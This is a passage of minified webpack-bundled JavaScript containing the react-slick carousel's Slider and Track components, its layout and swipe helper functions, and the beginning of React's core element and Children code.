o=s(l(67294)),a=l(58517),i=s(l(80973)),n=s(l(23492)),r=l(15518);function s(e){return e&&e.__esModule?e:{default:e}}function p(e){return p="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},p(e)}function c(){return c=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var l=arguments[t];for(var o in l)Object.prototype.hasOwnProperty.call(l,o)&&(e[o]=l[o])}return e},c.apply(this,arguments)}function u(e,t){var l=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),l.push.apply(l,o)}return l}function d(e){for(var t=1;t<arguments.length;t++){var l=null!=arguments[t]?arguments[t]:{};t%2?u(Object(l),!0).forEach((function(t){v(e,t,l[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(l)):u(Object(l)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(l,t))}))}return e}function m(e,t){for(var l=0;l<t.length;l++){var o=t[l];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}}function g(e,t){return g=Object.setPrototypeOf||function(e,t){return e.__proto__=t,e},g(e,t)}function y(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function b(e){return b=Object.setPrototypeOf?Object.getPrototypeOf:function(e){return e.__proto__||Object.getPrototypeOf(e)},b(e)}function v(e,t,l){return t in e?Object.defineProperty(e,t,{value:l,enumerable:!0,configurable:!0,writable:!0}):e[t]=l,e}var h=(0,r.canUseDOM)()&&l(24974),f=function(e){!function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),t&&g(e,t)}(k,e);var t,l,s,u,f=(s=k,u=function(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Date.prototype.toString.call(Reflect.construct(Date,[],(function(){}))),!0}catch(e){return!1}}(),function(){var e,t=b(s);if(u){var l=b(this).constructor;e=Reflect.construct(t,arguments,l)}else e=t.apply(this,arguments);return function(e,t){return!t||"object"!==p(t)&&"function"!=typeof t?y(e):t}(this,e)});function k(e){var t;return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,k),v(y(t=f.call(this,e)),"innerSliderRefHandler",(function(e){return t.innerSlider=e})),v(y(t),"slickPrev",(function(){return t.innerSlider.slickPrev()})),v(y(t),"slickNext",(function(){return t.innerSlider.slickNext()})),v(y(t),"slickGoTo",(function(e){var l=arguments.length>1&&void 0!==arguments[1]&&arguments[1];return t.innerSlider.slickGoTo(e,l)})),v(y(t),"slickPause",(function(){return t.innerSlider.pause("paused")})),v(y(t),"slickPlay",(function(){return t.innerSlider.autoPlay("play")})),t.state={breakpoint:null},t._responsiveMediaHandlers=[],t}return t=k,(l=[{key:"media",value:function(e,t){h.register(e,t),this._responsiveMediaHandlers.push({query:e,handler:t})}},{key:"componentDidMount",value:function(){var e=this;if(this.props.responsive){var t=this.props.responsive.map((function(e){return e.breakpoint}));t.sort((function(e,t){return e-t})),t.forEach((function(l,o){var a;a=0===o?(0,i.default)({minWidth:0,maxWidth:l}):(0,i.default)({minWidth:t[o-1]+1,maxWidth:l}),(0,r.canUseDOM)()&&e.media(a,(function(){e.setState({breakpoint:l})}))}));var l=(0,i.default)({minWidth:t.slice(-1)[0]});(0,r.canUseDOM)()&&this.media(l,(function(){e.setState({breakpoint:null})}))}}},{key:"componentWillUnmount",value:function(){this._responsiveMediaHandlers.forEach((function(e){h.unregister(e.query,e.handler)}))}},{key:"render",value:function(){var e,t,l=this;(e=this.state.breakpoint?"unslick"===(t=this.props.responsive.filter((function(e){return e.breakpoint===l.state.breakpoint})))[0].settings?"unslick":d(d(d({},n.default),this.props),t[0].settings):d(d({},n.default),this.props)).centerMode&&(e.slidesToScroll,e.slidesToScroll=1),e.fade&&(e.slidesToShow,e.slidesToScroll,e.slidesToShow=1,e.slidesToScroll=1);var i=o.default.Children.toArray(this.props.children);i=i.filter((function(e){return"string"==typeof e?!!e.trim():!!e})),e.variableWidth&&(e.rows>1||e.slidesPerRow>1)&&(console.warn("variableWidth is not supported in case of rows > 1 or slidesPerRow > 1"),e.variableWidth=!1);for(var r=[],s=null,p=0;p<i.length;p+=e.rows*e.slidesPerRow){for(var u=[],m=p;m<p+e.rows*e.slidesPerRow;m+=e.slidesPerRow){for(var g=[],y=m;y<m+e.slidesPerRow&&(e.variableWidth&&i[y].props.style&&(s=i[y].props.style.width),!(y>=i.length));y+=1)g.push(o.default.cloneElement(i[y],{key:100*p+10*m+y,tabIndex:-1,style:{width:"".concat(100/e.slidesPerRow,"%"),display:"inline-block"}}));u.push(o.default.createElement("div",{key:10*p+m},g))}e.variableWidth?r.push(o.default.createElement("div",{key:p,style:{width:s}},u)):r.push(o.default.createElement("div",{key:p},u))}if("unslick"===e){var b="regular slider "+(this.props.className||"");return o.default.createElement("div",{className:b},i)}return r.length<=e.slidesToShow&&(e.unslick=!0),o.default.createElement(a.InnerSlider,c({style:this.props.style,ref:this.innerSliderRefHandler},e),r)}}])&&m(t.prototype,l),k}(o.default.Component);t.default=f},64740:(e,t,l)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.Track=void 0;var o=n(l(67294)),a=n(l(94184)),i=l(15518);function n(e){return e&&e.__esModule?e:{default:e}}function r(e){return r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}function s(){return s=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var l=arguments[t];for(var o in l)Object.prototype.hasOwnProperty.call(l,o)&&(e[o]=l[o])}return e},s.apply(this,arguments)}function p(e,t){for(var l=0;l<t.length;l++){var o=t[l];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}}function c(e,t){return c=Object.setPrototypeOf||function(e,t){return e.__proto__=t,e},c(e,t)}function u(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function d(e){return d=Object.setPrototypeOf?Object.getPrototypeOf:function(e){return e.__proto__||Object.getPrototypeOf(e)},d(e)}function m(e,t){var l=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),l.push.apply(l,o)}return l}function g(e){for(var t=1;t<arguments.length;t++){var l=null!=arguments[t]?arguments[t]:{};t%2?m(Object(l),!0).forEach((function(t){y(e,t,l[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(l)):m(Object(l)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(l,t))}))}return e}function y(e,t,l){return t in e?Object.defineProperty(e,t,{value:l,enumerable:!0,configurable:!0,writable:!0}):e[t]=l,e}var b=function(e){var t,l,o,a,i;return o=(i=e.rtl?e.slideCount-1-e.index:e.index)<0||i>=e.slideCount,e.centerMode?(a=Math.floor(e.slidesToShow/2),l=(i-e.currentSlide)%e.slideCount==0,i>e.currentSlide-a-1&&i<=e.currentSlide+a&&(t=!0)):t=e.currentSlide<=i&&i<e.currentSlide+e.slidesToShow,{"slick-slide":!0,"slick-active":t,"slick-center":l,"slick-cloned":o,"slick-current":i===(e.targetSlide<0?e.targetSlide+e.slideCount:e.targetSlide>=e.slideCount?e.targetSlide-e.slideCount:e.targetSlide)}},v=function(e,t){return e.key||t},h=function(e){!function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),t&&c(e,t)}(f,e);var t,l,n,m,h=(n=f,m=function(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Date.prototype.toString.call(Reflect.construct(Date,[],(function(){}))),!0}catch(e){return!1}}(),function(){var e,t=d(n);if(m){var l=d(this).constructor;e=Reflect.construct(t,arguments,l)}else e=t.apply(this,arguments);return function(e,t){return!t||"object"!==r(t)&&"function"!=typeof t?u(e):t}(this,e)});function f(){var e;!function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,f);for(var t=arguments.length,l=new Array(t),o=0;o<t;o++)l[o]=arguments[o];return y(u(e=h.call.apply(h,[this].concat(l))),"node",null),y(u(e),"handleRef",(function(t){e.node=t})),e}return t=f,(l=[{key:"render",value:function(){var e=function(e){var t,l=[],n=[],r=[],s=o.default.Children.count(e.children),p=(0,i.lazyStartIndex)(e),c=(0,i.lazyEndIndex)(e);return o.default.Children.forEach(e.children,(function(u,d){var m,y={message:"children",index:d,slidesToScroll:e.slidesToScroll,currentSlide:e.currentSlide};m=!e.lazyLoad||e.lazyLoad&&e.lazyLoadedList.indexOf(d)>=0?u:o.default.createElement("div",null);var h=function(e){var t={};return void 0!==e.variableWidth&&!1!==e.variableWidth||(t.width=e.slideWidth),e.fade&&(t.position="relative",e.vertical?t.top=-e.index*parseInt(e.slideHeight):t.left=-e.index*parseInt(e.slideWidth),t.opacity=e.currentSlide===e.index?1:0,e.useCSS&&(t.transition="opacity "+e.speed+"ms "+e.cssEase+", visibility "+e.speed+"ms "+e.cssEase)),t}(g(g({},e),{},{index:d})),f=m.props.className||"",k=b(g(g({},e),{},{index:d}));if(l.push(o.default.cloneElement(m,{key:"original"+v(m,d),"data-index":d,className:(0,a.default)(k,f),tabIndex:"-1","aria-hidden":!k["slick-active"],style:g(g({outline:"none"},m.props.style||{}),h),onClick:function(t){m.props&&m.props.onClick&&m.props.onClick(t),e.focusOnSelect&&e.focusOnSelect(y)}})),e.infinite&&!1===e.fade){var w=s-d;w<=(0,i.getPreClones)(e)&&s!==e.slidesToShow&&((t=-w)>=p&&(m=u),k=b(g(g({},e),{},{index:t})),n.push(o.default.cloneElement(m,{key:"precloned"+v(m,t),"data-index":t,tabIndex:"-1",className:(0,a.default)(k,f),"aria-hidden":!k["slick-active"],style:g(g({},m.props.style||{}),h),onClick:function(t){m.props&&m.props.onClick&&m.props.onClick(t),e.focusOnSelect&&e.focusOnSelect(y)}}))),s!==e.slidesToShow&&((t=s+d)<c&&(m=u),k=b(g(g({},e),{},{index:t})),r.push(o.default.cloneElement(m,{key:"postcloned"+v(m,t),"data-index":t,tabIndex:"-1",className:(0,a.default)(k,f),"aria-hidden":!k["slick-active"],style:g(g({},m.props.style||{}),h),onClick:function(t){m.props&&m.props.onClick&&m.props.onClick(t),e.focusOnSelect&&e.focusOnSelect(y)}})))}})),e.rtl?n.concat(l,r).reverse():n.concat(l,r)}(this.props),t=this.props,l={onMouseEnter:t.onMouseEnter,onMouseOver:t.onMouseOver,onMouseLeave:t.onMouseLeave};return o.default.createElement("div",s({ref:this.handleRef,className:"slick-track",style:this.props.trackStyle},l),e)}}])&&p(t.prototype,l),f}(o.default.PureComponent);t.Track=h},15518:(e,t,l)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.clamp=s,t.canUseDOM=t.slidesOnLeft=t.slidesOnRight=t.siblingDirection=t.getTotalSlides=t.getPostClones=t.getPreClones=t.getTrackLeft=t.getTrackAnimateCSS=t.getTrackCSS=t.checkSpecKeys=t.getSlideCount=t.checkNavigable=t.getNavigableIndexes=t.swipeEnd=t.swipeMove=t.swipeStart=t.keyHandler=t.changeSlide=t.slideHandler=t.initializedState=t.extractObject=t.canGoNext=t.getSwipeDirection=t.getHeight=t.getWidth=t.lazySlidesOnRight=t.lazySlidesOnLeft=t.lazyEndIndex=t.lazyStartIndex=t.getRequiredLazySlides=t.getOnDemandLazySlides=t.safePreventDefault=void 0;var o,a=(o=l(67294))&&o.__esModule?o:{default:o};function i(e,t){var l=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),l.push.apply(l,o)}return l}function n(e){for(var t=1;t<arguments.length;t++){var l=null!=arguments[t]?arguments[t]:{};t%2?i(Object(l),!0).forEach((function(t){r(e,t,l[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(l)):i(Object(l)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(l,t))}))}return e}function r(e,t,l){return t in e?Object.defineProperty(e,t,{value:l,enumerable:!0,configurable:!0,writable:!0}):e[t]=l,e}function s(e,t,l){return Math.max(t,Math.min(e,l))}var p=function(e){["onTouchStart","onTouchMove","onWheel"].includes(e._reactName)||e.preventDefault()};t.safePreventDefault=p;var c=function(e){for(var t=[],l=u(e),o=d(e),a=l;a<o;a++)e.lazyLoadedList.indexOf(a)<0&&t.push(a);return t};t.getOnDemandLazySlides=c,t.getRequiredLazySlides=function(e){for(var t=[],l=u(e),o=d(e),a=l;a<o;a++)t.push(a);return t};var u=function(e){return e.currentSlide-m(e)};t.lazyStartIndex=u;var d=function(e){return e.currentSlide+g(e)};t.lazyEndIndex=d;var m=function(e){return e.centerMode?Math.floor(e.slidesToShow/2)+(parseInt(e.centerPadding)>0?1:0):0};t.lazySlidesOnLeft=m;var g=function(e){return e.centerMode?Math.floor((e.slidesToShow-1)/2)+1+(parseInt(e.centerPadding)>0?1:0):e.slidesToShow};t.lazySlidesOnRight=g;var y=function(e){return e&&e.offsetWidth||0};t.getWidth=y;var b=function(e){return e&&e.offsetHeight||0};t.getHeight=b;var v=function(e){var t,l,o,a,i=arguments.length>1&&void 0!==arguments[1]&&arguments[1];return t=e.startX-e.curX,l=e.startY-e.curY,o=Math.atan2(l,t),(a=Math.round(180*o/Math.PI))<0&&(a=360-Math.abs(a)),a<=45&&a>=0||a<=360&&a>=315?"left":a>=135&&a<=225?"right":!0===i?a>=35&&a<=135?"up":"down":"vertical"};t.getSwipeDirection=v;var h=function(e){var t=!0;return e.infinite||(e.centerMode&&e.currentSlide>=e.slideCount-1||e.slideCount<=e.slidesToShow||e.currentSlide>=e.slideCount-e.slidesToShow)&&(t=!1),t};t.canGoNext=h,t.extractObject=function(e,t){var l={};return t.forEach((function(t){return l[t]=e[t]})),l},t.initializedState=function(e){var t,l=a.default.Children.count(e.children),o=e.listRef,i=Math.ceil(y(o)),r=e.trackRef&&e.trackRef.node,s=Math.ceil(y(r));if(e.vertical)t=i;else{var p=e.centerMode&&2*parseInt(e.centerPadding);"string"==typeof e.centerPadding&&"%"===e.centerPadding.slice(-1)&&(p*=i/100),t=Math.ceil((i-p)/e.slidesToShow)}var u=o&&b(o.querySelector('[data-index="0"]')),d=u*e.slidesToShow,m=void 0===e.currentSlide?e.initialSlide:e.currentSlide;e.rtl&&void 0===e.currentSlide&&(m=l-1-e.initialSlide);var g=e.lazyLoadedList||[],v=c(n(n({},e),{},{currentSlide:m,lazyLoadedList:g})),h={slideCount:l,slideWidth:t,listWidth:i,trackWidth:s,currentSlide:m,slideHeight:u,listHeight:d,lazyLoadedList:g=g.concat(v)};return null===e.autoplaying&&e.autoplay&&(h.autoplaying="playing"),h},t.slideHandler=function(e){var t=e.waitForAnimate,l=e.animating,o=e.fade,a=e.infinite,i=e.index,r=e.slideCount,p=e.lazyLoad,u=e.currentSlide,d=e.centerMode,m=e.slidesToScroll,g=e.slidesToShow,y=e.useCSS,b=e.lazyLoadedList;if(t&&l)return{};var v,f,k,w=i,x={},E={},S=a?i:s(i,0,r-1);if(o){if(!a&&(i<0||i>=r))return{};i<0?w=i+r:i>=r&&(w=i-r),p&&b.indexOf(w)<0&&(b=b.concat(w)),x={animating:!0,currentSlide:w,lazyLoadedList:b,targetSlide:w},E={animating:!1,targetSlide:w}}else v=w,w<0?(v=w+r,a?r%m!=0&&(v=r-r%m):v=0):!h(e)&&w>u?w=v=u:d&&w>=r?(w=a?r:r-1,v=a?0:r-1):w>=r&&(v=w-r,a?r%m!=0&&(v=0):v=r-g),!a&&w+g>=r&&(v=r-g),f=C(n(n({},e),{},{slideIndex:w})),k=C(n(n({},e),{},{slideIndex:v})),a||(f===k&&(w=v),f=k),p&&(b=b.concat(c(n(n({},e),{},{currentSlide:w})))),y?(x={animating:!0,currentSlide:v,trackStyle:_(n(n({},e),{},{left:f})),lazyLoadedList:b,targetSlide:S},E={animating:!1,currentSlide:v,trackStyle:T(n(n({},e),{},{left:k})),swipeLeft:null,targetSlide:S}):x={currentSlide:v,trackStyle:T(n(n({},e),{},{left:k})),lazyLoadedList:b,targetSlide:S};return{state:x,nextState:E}},t.changeSlide=function(e,t){var l,o,a,i,r=e.slidesToScroll,s=e.slidesToShow,p=e.slideCount,c=e.currentSlide,u=e.targetSlide,d=e.lazyLoad,m=e.infinite;if(l=p%r!=0?0:(p-c)%r,"previous"===t.message)i=c-(a=0===l?r:s-l),d&&!m&&(i=-1==(o=c-a)?p-1:o),m||(i=u-r);else if("next"===t.message)i=c+(a=0===l?r:l),d&&!m&&(i=(c+r)%p+l),m||(i=u+r);else if("dots"===t.message)i=t.index*t.slidesToScroll;else if("children"===t.message){if(i=t.index,m){var g=L(n(n({},e),{},{targetSlide:i}));i>t.currentSlide&&"left"===g?i-=p:i<t.currentSlide&&"right"===g&&(i+=p)}}else"index"===t.message&&(i=Number(t.index));return i},t.keyHandler=function(e,t,l){return e.target.tagName.match("TEXTAREA|INPUT|SELECT")||!t?"":37===e.keyCode?l?"next":"previous":39===e.keyCode?l?"previous":"next":""},t.swipeStart=function(e,t,l){return"IMG"===e.target.tagName&&p(e),!t||!l&&-1!==e.type.indexOf("mouse")?"":{dragging:!0,touchObject:{startX:e.touches?e.touches[0].pageX:e.clientX,startY:e.touches?e.touches[0].pageY:e.clientY,curX:e.touches?e.touches[0].pageX:e.clientX,curY:e.touches?e.touches[0].pageY:e.clientY}}},t.swipeMove=function(e,t){var l=t.scrolling,o=t.animating,a=t.vertical,i=t.swipeToSlide,r=t.verticalSwiping,s=t.rtl,c=t.currentSlide,u=t.edgeFriction,d=t.edgeDragged,m=t.onEdge,g=t.swiped,y=t.swiping,b=t.slideCount,f=t.slidesToScroll,k=t.infinite,w=t.touchObject,x=t.swipeEvent,_=t.listHeight,E=t.listWidth;if(!l){if(o)return p(e);a&&i&&r&&p(e);var S,P={},L=C(t);w.curX=e.touches?e.touches[0].pageX:e.clientX,w.curY=e.touches?e.touches[0].pageY:e.clientY,w.swipeLength=Math.round(Math.sqrt(Math.pow(w.curX-w.startX,2)));var I=Math.round(Math.sqrt(Math.pow(w.curY-w.startY,2)));if(!r&&!y&&I>10)return{scrolling:!0};r&&(w.swipeLength=I);var B=(s?-1:1)*(w.curX>w.startX?1:-1);r&&(B=w.curY>w.startY?1:-1);var U=Math.ceil(b/f),M=v(t.touchObject,r),A=w.swipeLength;return k||(0===c&&("right"===M||"down"===M)||c+1>=U&&("left"===M||"up"===M)||!h(t)&&("left"===M||"up"===M))&&(A=w.swipeLength*u,!1===d&&m&&(m(M),P.edgeDragged=!0)),!g&&x&&(x(M),P.swiped=!0),S=a?L+A*(_/E)*B:s?L-A*B:L+A*B,r&&(S=L+A*B),P=n(n({},P),{},{touchObject:w,swipeLeft:S,trackStyle:T(n(n({},t),{},{left:S}))}),Math.abs(w.curX-w.startX)<.8*Math.abs(w.curY-w.startY)||w.swipeLength>10&&(P.swiping=!0,p(e)),P}},t.swipeEnd=function(e,t){var l=t.dragging,o=t.swipe,a=t.touchObject,i=t.listWidth,r=t.touchThreshold,s=t.verticalSwiping,c=t.listHeight,u=t.swipeToSlide,d=t.scrolling,m=t.onSwipe,g=t.targetSlide,y=t.currentSlide,b=t.infinite;if(!l)return o&&p(e),{};var h=s?c/r:i/r,f=v(a,s),x={dragging:!1,edgeDragged:!1,scrolling:!1,swiping:!1,swiped:!1,swipeLeft:null,touchObject:{}};if(d)return x;if(!a.swipeLength)return x;if(a.swipeLength>h){var T,E;p(e),m&&m(f);var S=b?y:g;switch(f){case"left":case"up":E=S+w(t),T=u?k(t,E):E,x.currentDirection=0;break;case"right":case"down":E=S-w(t),T=u?k(t,E):E,x.currentDirection=1;break;default:T=S}x.triggerSlideHandler=T}else{var P=C(t);x.trackStyle=_(n(n({},t),{},{left:P}))}return x};var f=function(e){for(var t=e.infinite?2*e.slideCount:e.slideCount,l=e.infinite?-1*e.slidesToShow:0,o=e.infinite?-1*e.slidesToShow:0,a=[];l<t;)a.push(l),l=o+e.slidesToScroll,o+=Math.min(e.slidesToScroll,e.slidesToShow);return a};t.getNavigableIndexes=f;var k=function(e,t){var l=f(e),o=0;if(t>l[l.length-1])t=l[l.length-1];else for(var a in l){if(t<l[a]){t=o;break}o=l[a]}return t};t.checkNavigable=k;var w=function(e){var t=e.centerMode?e.slideWidth*Math.floor(e.slidesToShow/2):0;if(e.swipeToSlide){var l,o=e.listRef,a=o.querySelectorAll&&o.querySelectorAll(".slick-slide")||[];if(Array.from(a).every((function(o){if(e.vertical){if(o.offsetTop+b(o)/2>-1*e.swipeLeft)return l=o,!1}else if(o.offsetLeft-t+y(o)/2>-1*e.swipeLeft)return l=o,!1;return!0})),!l)return 0;var i=!0===e.rtl?e.slideCount-e.currentSlide:e.currentSlide;return Math.abs(l.dataset.index-i)||1}return e.slidesToScroll};t.getSlideCount=w;var x=function(e,t){return t.reduce((function(t,l){return t&&e.hasOwnProperty(l)}),!0)?null:console.error("Keys Missing:",e)};t.checkSpecKeys=x;var T=function(e){var t,l;x(e,["left","variableWidth","slideCount","slidesToShow","slideWidth"]);var o=e.slideCount+2*e.slidesToShow;e.vertical?l=o*e.slideHeight:t=P(e)*e.slideWidth;var a={opacity:1,transition:"",WebkitTransition:""};if(e.useTransform){var i=e.vertical?"translate3d(0px, "+e.left+"px, 0px)":"translate3d("+e.left+"px, 0px, 0px)",r=e.vertical?"translate3d(0px, "+e.left+"px, 0px)":"translate3d("+e.left+"px, 0px, 0px)",s=e.vertical?"translateY("+e.left+"px)":"translateX("+e.left+"px)";a=n(n({},a),{},{WebkitTransform:i,transform:r,msTransform:s})}else e.vertical?a.top=e.left:a.left=e.left;return e.fade&&(a={opacity:1}),t&&(a.width=t),l&&(a.height=l),window&&!window.addEventListener&&window.attachEvent&&(e.vertical?a.marginTop=e.left+"px":a.marginLeft=e.left+"px"),a};t.getTrackCSS=T;var _=function(e){x(e,["left","variableWidth","slideCount","slidesToShow","slideWidth","speed","cssEase"]);var t=T(e);return e.useTransform?(t.WebkitTransition="-webkit-transform "+e.speed+"ms "+e.cssEase,t.transition="transform "+e.speed+"ms "+e.cssEase):e.vertical?t.transition="top "+e.speed+"ms "+e.cssEase:t.transition="left "+e.speed+"ms "+e.cssEase,t};t.getTrackAnimateCSS=_;var C=function(e){if(e.unslick)return 0;x(e,["slideIndex","trackRef","infinite","centerMode","slideCount","slidesToShow","slidesToScroll","slideWidth","listWidth","variableWidth","slideHeight"]);var t,l,o=e.slideIndex,a=e.trackRef,i=e.infinite,n=e.centerMode,r=e.slideCount,s=e.slidesToShow,p=e.slidesToScroll,c=e.slideWidth,u=e.listWidth,d=e.variableWidth,m=e.slideHeight,g=e.fade,y=e.vertical;if(g||1===e.slideCount)return 0;var b=0;if(i?(b=-E(e),r%p!=0&&o+p>r&&(b=-(o>r?s-(o-r):r%p)),n&&(b+=parseInt(s/2))):(r%p!=0&&o+p>r&&(b=s-r%p),n&&(b=parseInt(s/2))),t=y?o*m*-1+b*m:o*c*-1+b*c,!0===d){var v,h=a&&a.node;if(v=o+E(e),t=(l=h&&h.childNodes[v])?-1*l.offsetLeft:0,!0===n){v=i?o+E(e):o,l=h&&h.children[v],t=0;for(var f=0;f<v;f++)t-=h&&h.children[f]&&h.children[f].offsetWidth;t-=parseInt(e.centerPadding),t+=l&&(u-l.offsetWidth)/2}}return t};t.getTrackLeft=C;var E=function(e){return e.unslick||!e.infinite?0:e.variableWidth?e.slideCount:e.slidesToShow+(e.centerMode?1:0)};t.getPreClones=E;var S=function(e){return e.unslick||!e.infinite?0:e.slideCount};t.getPostClones=S;var P=function(e){return 1===e.slideCount?1:E(e)+e.slideCount+S(e)};t.getTotalSlides=P;var L=function(e){return e.targetSlide>e.currentSlide?e.targetSlide>e.currentSlide+I(e)?"left":"right":e.targetSlide<e.currentSlide-B(e)?"right":"left"};t.siblingDirection=L;var I=function(e){var t=e.slidesToShow,l=e.centerMode,o=e.rtl,a=e.centerPadding;if(l){var i=(t-1)/2+1;return parseInt(a)>0&&(i+=1),o&&t%2==0&&(i+=1),i}return o?0:t-1};t.slidesOnRight=I;var B=function(e){var t=e.slidesToShow,l=e.centerMode,o=e.rtl,a=e.centerPadding;if(l){var i=(t-1)/2+1;return parseInt(a)>0&&(i+=1),o||t%2!=0||(i+=1),i}return o?t-1:0};t.slidesOnLeft=B,t.canUseDOM=function(){return!("undefined"==typeof window||!window.document||!window.document.createElement)}},72408:(e,t,l)=>{"use strict";var o=l(27418),a=60103,i=60106;t.Fragment=60107,t.StrictMode=60108,t.Profiler=60114;var n=60109,r=60110,s=60112;t.Suspense=60113;var p=60115,c=60116;if("function"==typeof Symbol&&Symbol.for){var u=Symbol.for;a=u("react.element"),i=u("react.portal"),t.Fragment=u("react.fragment"),t.StrictMode=u("react.strict_mode"),t.Profiler=u("react.profiler"),n=u("react.provider"),r=u("react.context"),s=u("react.forward_ref"),t.Suspense=u("react.suspense"),p=u("react.memo"),c=u("react.lazy")}var d="function"==typeof Symbol&&Symbol.iterator;function m(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,l=1;l<arguments.length;l++)t+="&args[]="+encodeURIComponent(arguments[l]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var g={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},y={};function b(e,t,l){this.props=e,this.context=t,this.refs=y,this.updater=l||g}function v(){}function h(e,t,l){this.props=e,this.context=t,this.refs=y,this.updater=l||g}b.prototype.isReactComponent={},b.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error(m(85));this.updater.enqueueSetState(this,e,t,"setState")},b.prototype.forceUpdate=function(e){this.updater.enqueueForceUpdate(this,e,"forceUpdate")},v.prototype=b.prototype;var f=h.prototype=new v;f.constructor=h,o(f,b.prototype),f.isPureReactComponent=!0;var k={current:null},w=Object.prototype.hasOwnProperty,x={key:!0,ref:!0,__self:!0,__source:!0};function T(e,t,l){var o,i={},n=null,r=null;if(null!=t)for(o in void 0!==t.ref&&(r=t.ref),void 0!==t.key&&(n=""+t.key),t)w.call(t,o)&&!x.hasOwnProperty(o)&&(i[o]=t[o]);var s=arguments.length-2;if(1===s)i.children=l;else if(1<s){for(var p=Array(s),c=0;c<s;c++)p[c]=arguments[c+2];i.children=p}if(e&&e.defaultProps)for(o in s=e.defaultProps)void 0===i[o]&&(i[o]=s[o]);return{$$typeof:a,type:e,key:n,ref:r,props:i,_owner:k.current}}function _(e){return"object"==typeof e&&null!==e&&e.$$typeof===a}var C=/\/+/g;function E(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+e.replace(/[=:]/g,(function(e){return t[e]}))}(""+e.key):t.toString(36)}function S(e,t,l,o,n){var r=typeof e;"undefined"!==r&&"boolean"!==r||(e=null);var s=!1;if(null===e)s=!0;else switch(r){case"string":case"number":s=!0;break;case"object":switch(e.$$typeof){case a:case i:s=!0}}if(s)return n=n(s=e),e=""===o?"."+E(s,0):o,Array.isArray(n)?(l="",null!=e&&(l=e.replace(C,"$&/")+"/"),S(n,t,l,"",(function(e){return e}))):null!=n&&(_(n)&&(n=function(e,t){return{$$typeof:a,type:e.type,key:t,ref:e.ref,props:e.props,_owner:e._owner}}(n,l+(!n.key||s&&s.key===n.key?"":(""+n.key).replace(C,"$&/")+"/")+e)),t.push(n)),1;if(s=0,o=""===o?".":o+":",Array.isArray(e))for(var p=0;p<e.length;p++){var c=o+E(r=e[p],p);s+=S(r,t,l,c,n)}else if(c=function(e){return null===e||"object"!=typeof e?null:"function"==typeof(e=d&&e[d]||e["@@iterator"])?e:null}(e),"function"==typeof c)for(e=c.call(e),p=0;!(r=e.next()).done;)s+=S(r=r.value,t,l,c=o+E(r,p++),n);else if("object"===r)throw t=""+e,Error(m(31,"[object Object]"===t?"object with keys {"+Object.keys(e).join(", ")+"}":t));return s}function P(e,t,l){if(null==e)return e;var o=[],a=0;return S(e,o,"","",(function(e){return t.call(l,e,a++)})),o}function L(e){if(-1===e._status){var t=e._result;t=t(),e._status=0,e._result=t,t.then((function(t){0===e._status&&(t=t.default,e._status=1,e._result=t)}),(function(t){0===e._status&&(e._status=2,e._result=t)}))}if(1===e._status)return e._result;throw e._result}var I={current:null};function B(){var e=I.current;if(null===e)throw Error(m(321));return e}var U={ReactCurrentDispatcher:I,ReactCurrentBatchConfig:{transition:0},ReactCurrentOwner:k,IsSomeRendererActing:{current:!1},assign:o};t.Children={map:P,forEach:function(e,t,l){P(e,(function(){t.apply(this,arguments)}),l)},count:function(e){var t=0;return P(e,(function(){t++})),t},toArray:function(e){return P(e,(function(e){return e}))||[]},only:function(e){if(!_(e))throw Error(m(143));return 